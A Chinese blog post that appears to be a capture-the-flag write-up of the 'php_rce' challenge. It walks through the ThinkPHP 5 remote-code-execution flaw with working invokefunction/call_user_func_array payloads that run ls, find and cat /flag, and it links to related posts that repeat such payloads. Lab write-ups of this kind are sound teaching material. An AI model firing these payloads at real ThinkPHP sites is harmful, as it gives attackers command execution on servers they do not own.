WEB:php_rce

已于 2023-07-30 14:10:21 修改
阅读量938 收藏
点赞数
分类专栏: 攻防世界 文章标签: php 开发语言 web安全 网络安全
于 2023-07-30 14:09:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gsumall04/article/details/132006406
版权

背景知识

        Linux命令

        thinkPHPv5漏洞

题目

 打开页面,页面显示为thinkphp v5的界面,可以判断框架为thinkPHP,可以去网上查找相关的漏洞

由题目可知,php rec是一个通过远程代码执行漏洞来攻击php程序的一种方式

因为不知道是php版本几,先尝试一下

使用thinkPHP 5.1的漏洞

payload

 /?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

提示为5.0.2版本

payload

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

 

 说明命令执行成功

接着抓取flag

payload

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name "flag"

由页面提示可知,flag储存在flag文件下的flag文件中

用cat命令读取flag

payload

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

 得到flag

参考学习链接:

攻防世界-web篇(php_rce)详解_渗透小剑客的博客-CSDN博客

https://www.cnblogs.com/qiushuo/p/17454519.html

sleepywin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界web进阶_php_rce
chy082的博客
08-21 316
上网查一下ThinkPHP v5,发现有rce漏洞 找到网上的payload: /?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir 看看上级目录 http://220.249.52.133:37949/?s=index/\think\app/invokefunction&function=call_user_func_array&v
攻防世界web新手关之php_rce
weixin_45746283的博客
11-16 615
攻防世界web新手关之php_rce
攻防世界web高阶(php rce
ctfmove1的博客
07-16 604
需要自己百度下thinkphp5的漏洞(其实看完就知道怎么做这个题目了) payload: s=index/think\App/invokeFunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name “*flag” 先查找关于flag在哪 s=index/think\App/invokeFunction&function=call_user_func_array&vars
攻防世界web高手进阶区 php_rce
weixin_61835841的博客
04-21 1729
工具 火狐 1.打开链接,观察到这是一个Think PHP V5 框架 2.尝试输入index.php,发现页面没有变化,继续输入下一级文件(随便输入),发现爆出了版本5.0.20 3.查询相关版本的漏洞(百度或者github)都可以试试 、 查询到的payload:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls 放进去尝试发现可
thinkPHP_V5漏洞
qq_53099802的博客
04-28 3693
php_rce攻防世界
Firmware_web_rce_finder:FWRF是用于固件Web端分析的开源工具
05-13
固件Web Rce Finder FWRF(不要尝试将其发音)是用于固件... 检查rce:尝试通过那些参数执行基本代码 测试服务器:启动测试服务器以进行手动搜索 Rce检查 服务器在攻击者端启动(侦听端口10020)并等待tcp数据包。 发
CVE-2021-3129:Laravel调试RCE
05-26
在resources/view/里添加了一个hello模板并引用了一个未定义变量,同时在routes/web.php添加路由(这个我加在源码里了,没写dockerfile里) 复现效果 脚本已放出,脚本要和phpggc项目文件夹在同一级目录下。 通用性不...
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
ThinkPHP 是一个流行的 PHP 框架,它提供了许多实用的功能来帮助开发者快速构建 Web 应用程序。然而,在 ThinkPHP 5.0.0 到 5.0.23 版本中存在一个 Remote Code Execution(RCE)漏洞,该漏洞允许攻击者在服务器上...
web_study:我在web_study上的n00b笔记
04-28
web_study 我在web_study上的n00b笔记 mrb3n的一个很好的“待办事项”清单 去做: Portswigger实验室会将您从0带到英雄 砍箱子/混合 /反映在 /关注以下示例项目: 用于代码审查PHP语言示例项目 •初学者:...
webcgi-exploits:多语言Web CGI界面漏洞利用
05-13
因此,我们可以利用这些故障来实现我们的目标,例如RCE,spwan a shell,port forward等。 漏洞利用 PHP Fastcgi 参考: 如果fcgi端口公开(或使用SSRF ),则fcgi_exp.go使用fastcgi读取或执行文件。 fcgi_...
ThinkPHP V5(漏洞解析及利用)及tornado知识点
qq_62046696的博客
10-03 3512
ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。
PHP无参数RCE
weixin_43610673的博客
03-14 2817
无参数函数RCE,即在不使用参数的条件下,仅使用函数进行REC。 如:代码中有 if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } 这时如果我们用传统的eval($_POST[‘code’]); 则无法通过正则的校验 /[^\W]+((?R)?)/ 对于...
xctf中php_rec的writeup,第十届全国大学生信息安全竞赛writeup
weixin_32589877的博客
03-13 1182
1.PHP execise 类型:WEB 分值:150分直接就能执行代码,先执行phpinfo(),发现禁用了如下函数assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl...
ThinkPHP5.x rec 漏洞分析与复现
MercyLin的博客
09-27 7415
https://help.aliyun.com/noticelist/articleid/1000081331.html?spm=5176.2020520001.1004.7.2e874bd363uLuf 先贴个漏洞预警,这里做一些内容摘要: 漏洞描述 由于ThinkPHP5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,黑客构造特定的请求,可直接GetWebShell。...
攻防世界-Web-php_rce
uh_eng的博客
08-05 595
0x01 打开题目,很明显是ThinkPHP5框架,这里就联想到ThinkPHP5的著名漏洞,再加上题目中的RCE(远程代码执行)解题思路基本就有了。 关于ThinkPHP5的这个漏洞,可以参考:ThinkPHP5 RCE漏洞重现及分析 0x02 使用payload验证一下漏洞: /index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=
[wp] 攻防世界 php_rce
MercyLin的博客
09-25 7699
根据提示,上网搜了下thinkphp5 rce漏洞,改一改payload就出了emmm ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat%20../../../flag");%27 下次写个...
攻防世界之php_rceWeb_php_include
qq_42728977的博客
01-19 2956
Web_php_unserialize php_rce web_php_include 1、漏洞点:php strstr() 绕过,伪协议包含漏洞 这个提有很多利用方法。 方法一: 访问页面看到如下: <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php...
ThinkPHP 远程命令执行漏洞复现(GetShell)
热门推荐
xy_sugar的博客
12-14 28万+
漏洞概况 ThinkPHP是一款国内流行的开源PHP框架,近日被爆出存在可能的远程代码执行漏洞,攻击者可向缓存文件内写入PHP代码,导致远程代码执行。虽然该漏洞利用需要有几个前提条件,但鉴于国内使用ThinkPHP框架的站点数量之多,该漏洞还是存在一定的影响范围。由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞。 漏洞危害 攻击者可通过该漏洞获取...
发布一个Yii2扩展把debug信息存储到MongoDB中
最新发布
yagas的专栏
06-26 309
本项目为yii2-debug的扩展,使用MongoDB对debug数据进行存储。如果使用Yii2进行多个应用的开发的话,把debug信息汇聚到一起可以方便查阅。
攻防世界php_rce
08-26
- *1* *2* *3* [攻防世界-web篇(php_rce)详解](https://blog.csdn.net/qq_54803507/article/details/127041653)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值